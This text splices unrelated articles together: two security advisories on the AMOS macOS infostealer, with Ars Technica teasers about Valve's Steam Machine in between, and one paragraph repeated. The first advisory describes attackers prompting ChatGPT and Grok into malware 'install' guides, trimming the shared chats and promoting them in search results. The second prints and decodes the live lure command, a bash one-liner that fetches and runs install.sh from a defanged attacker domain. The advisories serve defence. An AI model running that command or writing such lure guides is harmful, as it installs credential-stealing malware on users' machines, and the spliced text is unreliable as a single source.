Researchers have found evidence that AI conversations were inserted in Google search results to mislead macOS users into installing the Atomic macOS Stealer (AMOS). Both Grok and ChatGPT were found to have been abused in these attacks.

Forensic investigation of an AMOS alert showed the infection chain started when the user ran a Google search for “clear disk space on macOS.” Following that trail, the researchers found not one, but two poisoned AI conversations with instructions. Their testing showed that similar searches produced the same type of results, indicating this was a deliberate attempt to infect Mac users.

The search results led to AI conversations which provided clearly laid out instructions to run a command in the macOS Terminal. That command would end with the machine being infected with the AMOS malware.

If that sounds familiar, you may have read our post about sponsored search results that led to fake macOS software on GitHub. In that campaign, sponsored ads and SEO-poisoned search results pointed users to GitHub pages impersonating legitimate macOS software, where attackers provided step-by-step instructions that ultimately installed the AMOS infostealer.

As the researchers pointed out:

“Once the victim executed the command, a multi-stage infection chain began. The base64-encoded string in the Terminal command decoded to a URL hosting a malicious bash script, the first stage of an AMOS deployment designed to harvest credentials, escalate privileges, and establish persistence without ever triggering a security warning.”

This is dangerous for the user on many levels. Because there is no prompt or review, the user does not get a chance to see or assess what the downloaded script will do before it runs. It bypasses security because of the use of the command line, it can bypass normal file download protections and execute anything the attacker wants.

Other researchers have found a campaign that combines elements of both attacks: the shared AI conversation and fake software install instructions. They found user guides for installing OpenAI’s new Atlas browser for macOS through shared ChatGPT conversations, which in reality led to AMOS infections.

So how does this work?

The cybercriminals used prompt engineering to get ChatGPT to generate a step‑by‑step “installation/cleanup” guide which in reality will infect a system. ChatGPT’s sharing feature creates a public link to a single conversation that exists in the owner’s account. Attackers can craft a chat to produce the instructions they need and then tidy up the visible conversation so that what’s shared looks like a short, clean guide rather than a long back-and-forth.

Most major chat interfaces (including Grok on X) also let users delete conversations or selectively share screenshots. That makes it easy for criminals to present only the polished, “helpful” part of a conversation and hide how they arrived there.

The cybercriminals used prompt engineering to get ChatGPT to generate a step‑by‑step “installation/cleanup” guide that, in reality, installs malware. ChatGPT’s sharing feature creates a public link to a conversation that lives in the owner’s account. Attackers can curate their conversations to create a short, clean conversation which they can share.

Then the criminals either pay for a sponsored search result pointing to the shared conversation or they use SEO techniques to get their posts high in the search results. Sponsored search results can be customized to look a lot like legitimate results. You’ll need to check who the advertiser is to find out it’s not real.

From there, it’s a waiting game for the criminals. They rely on victims to find these AI conversations through search and then faithfully follow the step-by-step instructions.

How to stay safe

These attacks are clever and use legitimate platforms to reach their targets. But there are some precautions you can take.

• First and foremost, and I can’t say this often enough: Don’t click on sponsored search results. We have seen so many cases where sponsored results lead to malware, that we recommend skipping them or make sure you never see them. At best they cost the company you looked for money and at worst you fall prey to imposters.
• If you’re thinking about following a sponsored advertisement, check the advertiser first. Is it the company you’d expect to pay for that ad? Click the three‑dot menu next to the ad, then choose options like “About this ad” or “About this advertiser” to view the verified advertiser name and location.
• Use real-time anti-malware protection, preferably one that includes a web protection component.
• Never run copy-pasted commands from random pages or forums, even if they’re hosted on seemingly legitimate domains, and especially not commands that look like curl … | bash or similar combinations.

If you’ve scanned your Mac and found the AMOS information stealer:

• Remove any suspicious login items, LaunchAgents, or LaunchDaemons from the Library folders to ensure the malware does not persist after reboot.
• If any signs of persistent backdoor or unusual activity remain, strongly consider a full clean reinstall of macOS to ensure all malware components are eradicated. Only restore files from known clean backups. Do not reuse backups or Time Machine images that may be tainted by the infostealer.
• After reinstalling, check for additional rogue browser extensions, cryptowallet apps, and system modifications.
• Change all the passwords that were stored on the affected system and enable multi-factor authentication (MFA) for your important accounts.

If all this sounds too difficult for you to do yourself, ask someone or a company you trust to help you—our support team is happy to assist you if you have any concerns.

---

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

I wrote a couple of weeks ago about my personal homebrew Steam Machine, a self-built desktop under my TV featuring an AMD Ryzen 7 8700G processor and a Radeon 780M integrated GPU. I wouldn’t recommend making your own version of this build, especially with RAM prices as they currently are, but there are all kinds of inexpensive mini PCs on Amazon with the same GPU, and they’ll all be pretty good at playing the kinds of games that already run well on the less-powerful Steam Deck.

But this kind of hardware is an imperfect proxy for the Steam Machine that Valve plans to launch sometime next year—that box will include a dedicated GPU with 8GB of dedicated video memory, presenting both benefits and possible pitfalls compared to a system with an integrated GPU.

As a last pre-Steam Machine follow-up to our coverage so far, we’ve run tests on several games we test regularly in our GPU reviews to get a sense of how current versions of SteamOS stack up to Windows running on the same hardware. What we’ve found so far is basically the inverse of what we found when comparing handhelds: Windows usually has an edge on SteamOS’s performance, and sometimes that gap is quite large. And SteamOS also exacerbates problems with 8GB GPUs, hitting apparent RAM limits in more games and at lower resolutions compared to Windows.

Read full article

Comments

© Andrew Cunningham

When Valve announced its upcoming Steam Machine hardware last month, some eagle-eyed gamers may have been surprised to see that the official spec sheet lists support for HDMI 2.0 output, rather than the updated, higher-bandwidth HDMI 2.1 standard introduced in 2017. Now, Valve tells Ars that, while the hardware itself actually supports HDMI 2.1, the company is struggling to offer full support for that standard due to Linux drivers that are “still a work-in-progress on the software side.”

As we noted last year, the HDMI Forum (which manages the official specifications for HDMI standards) has officially blocked any open source implementation of HDMI 2.1. That means the open source AMD drivers used by SteamOS can’t fully implement certain features that are specific to the updated output standard.

“At this time an open source HDMI 2.1 implementation is not possible without running afoul of the HDMI Forum requirements,” AMD engineer Alex Deucher said at the time.

Read full article

Comments

© Valve

By Valve’s admission, its upcoming Steam Machine desktop isn’t swinging for the fences with its graphical performance. The specs promise decent 1080p-to-1440p performance in most games, with 4K occasionally reachable with assistance from FSR upscaling—about what you’d expect from a box with a modern midrange graphics card in it.

But there’s one spec that has caused some concern among Ars staffers and others with their eyes on the Steam Machine: The GPU comes with just 8GB of dedicated graphics RAM, an amount that is steadily becoming more of a bottleneck for midrange GPUs like AMD’s Radeon RX 7060 and 9060, or Nvidia’s GeForce RTX 4060 or 5060.

In our reviews of these GPUs, we’ve already run into some games where the RAM ceiling limits performance in Windows, especially at 1440p. But we’ve been doing more extensive testing of various GPUs with SteamOS, and we can confirm that in current betas, 8GB GPUs struggle even more on SteamOS than they do running the same games at the same settings in Windows 11.

Read full article

Comments

© Andrew Cunningham

Valve’s second big foray into first-party PC hardware isn’t a sequel to the much-imitated Steam Deck portable, but rather a desktop computer called the Steam Machine. And while it could go on your desk, Valve clearly intends for it to fit in an entertainment center under a TV—next to, or perhaps even instead of, a game console like the Xbox or PlayStation 5.

I am pretty sure this idea could work, and it’s because I’ve already been experimenting with what is essentially a “Steam Machine” underneath my own TV for months, starting in May when Valve began making it possible to install SteamOS on certain kinds of generic PC hardware.

Depending on what it costs—and we can only guess what it will cost—the Steam Machine could be a good fit for people who just want to plug a more powerful version of the Steam Deck experience into their TVs. But for people who like tinkering or who, like me, have been messing with miniature TV-connecting gaming PCs for years and are simply tired of trying to make Windows workable, the future promised by the Steam Machine is already here.

Read full article

Comments

© Andrew Cunningham

Nearly four years after the Steam Deck changed the world of portable gaming, Valve is getting ready to release SteamOS-powered hardware designed for the living room TV, or even as a desktop PC gaming replacement. The simply named Steam Machine and Steam Controller, both planned to ship in early 2026, are “optimized for gaming on Steam and designed for players to get even more out of their Steam Library,” Valve said in a press release.

A Steam Machine spec sheet shared by Valve lists a “semi-custom” six-core AMD Zen 4 CPU clocked at up to 4.8 Ghz alongside an AMD RDNA3 GPU with 28 compute units. The motherboard will include 16GB of DDR5 RAM and an additional 8GB of dedicated DDR6 VRAM for the GPU. The new hardware will come in two configurations with 512GB or 2TB of unspecified “SSD storage,” though Valve isn’t sharing pricing for either just yet.

Those chips and numbers suggest the Steam Machine will have roughly the same horsepower as a mid-range desktop gaming PC from a few years back. But Valve says its “Machine”—which it ranks as “over 6x more powerful than the Steam Deck”—is powerful enough to support ray-tracing and/or 4K, 60 fps gaming using FSR upscaling.

Read full article

Comments

© Valve

For years now, Valve has been slowly improving the capabilities of the Proton compatibility layer that lets thousands of Windows games work seamlessly on the Linux-based SteamOS. But Valve’s Windows-to-Linux compatibility layer generally only extends back to games written for Direct3D 8, the proprietary Windows graphics API Microsoft released in late 2000.

Now, a new open source project is seeking to extend Linux interoperability further back into PC gaming history. The d7vk project describes itself as “a Vulkan-based translation layer for Direct3D 7 [D3D7], which allows running 3D applications on Linux using Wine.”

More options are always welcome

The new project isn’t the first attempt to get Direct3D 7 games running on Linux. Wine‘s own built-in WineD3D compatibility layer has supported D3D7 in some form or another for at least two decades now. But the new d7vk project instead branches off the existing dxvk compatibility layer, which is already used by Valve’s Proton for SteamOS and which reportedly offers better performance than WineD3D on many games.

Read full article

Comments

© Arkane Studios

Fake versions of legitimate software are currently circulating on GitHub pages, in a large-scale campaign targeting Mac users.

Unfortunately, Malwarebytes for Mac is one of them.

Impersonating brands is sadly commonplace, as scammers take advantage of established brand names to target their victims. So this is nothing new, but we always want to warn you about it when we see it happening.

In this case, the cybercriminals’ goal is to distribute information stealers. They figured out a while ago that the easiest way to infect Macs is to get users to install the malware themselves, and the Atomic Stealer (aka AMOS) is the go-to information stealer for Macs.

The LastPass Threat Intelligence team has posted information about the campaign, which follows a similar pattern for all the impersonated software. Sometimes, the starting point is a sponsored Google ad (did we mention we don’t like them? Oh yes, we did!) that points to GitHub instead of the official page of the developer.

But in other, less obvious cases, you may see search results like these:

These only came up at the top of the search results when I explicitly searched for “Malwarebytes Github MacOS”, but the cybercriminals are known to have used Search Engine Optimization (SEO) techniques to get their listings higher in the search results.

The idea is to get the aspiring user to click on the “GET MALWAREBYTES” button on the dedicated GitHub page.

If someone does click that button, they will end up on a download page with instructions on how to install the fake product, which is actually an information stealer.

The terminal installation instructions for Malwarebytes for Mac pointed to a recently registered domain, but thankfully our Browser Guard blocked it anyway.

Here’s a technical breakdown of the instructions provided to the visitor:

• /bin/bash -c "<something>" runs a command using the Bash shell on macOS or Linux. Bash is the interpreter for shell commands.
• The part in quotes uses $( ... ). Everything inside this gets executed first; its output becomes part of the outer command.
• $(echo aHR0cHM6Ly9nb3NyZWVzdHIuY29tL2h1bi9pbnN0YWxsLnNo | base64 -d) echo ... | base64 -d decodes the long string.
• curl -fsSL is a command to download data from the web. The options mean:
  • -f: Fail silently for HTTP errors.-s: Silent mode (no progress bar).-S: Show errors if -s is used.
  • -L: Follow redirects.

So, putting all this together:

The inner command turns into: curl -fsSL https://gosreestr[.]com/hun/install.sh

The outer command becomes: /bin/bash -c "$(curl -fsSL https://gosreestr[.]com/hun/install.sh)"

So, the complete command tells the system to download a script directly from an external server and immediately execute it using Bash.

This is dangerous for the user on many levels. Because there is no prompt or review, the user does not get a chance to see or assess what the downloaded script will do before it runs. It bypasses security because of the use of the command line, it can bypass normal file download protections and execute anything the attacker wants.

The files to download have already been taken down, but users that recognize this chain of infection are under advice to thoroughly check their machines for an infection.

Impersonated software besides Malwarebytes and LastPass included:

• 1Password
• ActiveCampaign
• After Effects
• Audacity
• Auphonic
• Basecamp
• BetterSnapTool
• Biteable
• Bitpanda
• Bitsgap
• Blog2Social
• Blue Wallet
• Bonkbot
• Carbon Copy Cloner
• Charles Schwab
• Citibank
• CMC Markets
• Confluence
• Coolors
• DaVinci Resolve
• DefiLlama
• Desktop Clockology
• Desygner
• Docker
• Dropbox
• E-TRADE
• EigenLayer
• Fidelity
• Fliki
• Freqtrade Bot
• Freshworks
• Gemini
• GMGN AI
• Gunbot
• Hemingway Editor
• HeyGen
• Hootsuite
• HTX
• Hypertracker
• IRS
• KeyBank
• Lightstream
• Loopback
• Maestro Bot
• Melon
• Metatrader 5
• Metricool
• Mixpanel
• Mp3tag
• Mural
• NFT Creator
• NotchNook
• Notion
• Obsidian
• Onlypult
• Pendle Finance
• Pepperstone
• Pipedrive
• Plus500
• Privnote
• ProWritingAid
• Publer
• Raycast
• Reaper
• RecurPost
• Renderforest
• Rippling
• Riverside.fm
• Robinhood
• Rug AI
• Sage Intacct
• Salesloft
• SentinelOne
• Shippo
• Shopify
• SocialPilot
• Soundtrap
• StreamYard
• SurferSEO
• Thunderbird
• TweetDeck
• Uphold
• Veeva CRM
• Viraltag
• VSCO
• Vyond
• Webull
• Xai Games
• XSplit
• Zealy
• Zencastr
• Zenefits
• Zotero

But it’s highly likely that there will be more, so don’t see this as an exhaustive list.

How to stay safe

Both ThreatDown and Malwarebytes for Mac detect and block this Atomic Stealer variant and many others, but it’s better to not download it at all. There are a few golden guidelines on how to stay safe:

• Never run copy-pasted commands from random pages or forums even if they are on seemingly legitimate GitHub pages, and especially don’t use any that involve curl … | bash or similar combos.
• Always download software from the official developer pages. If they do not host it themselves, verify the download links with them.
• Avoid sponsored search results. At best they cost the company you looked for money and at worst you fall prey to imposters.
• Use real-time anti-malware protection, preferably one that includes a web protection component.

If you have scanned your Mac and found the information stealer:

• Remove any suspicious login items, LaunchAgents, or LaunchDaemons from the Library folders to ensure the malware does not persist after reboot.
• If any signs of persistent backdoor or unusual activity remain, strongly consider a full clean reinstall of macOS to ensure all malware components are eradicated. Only restore files from known clean backups. Do not reuse backups or Time Machine images that may be tainted by the infostealer.
• After reinstalling, check for additional rogue extensions, crypto wallet apps, and system modifications.
• Change all the passwords that were stored on the affected system and enable multi-factor authentication for your important accounts.
• If all this sounds too difficult for you to do yourself, ask someone or a company you trust to help you—our support team are happy to assist you if you have any concerns.

---

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.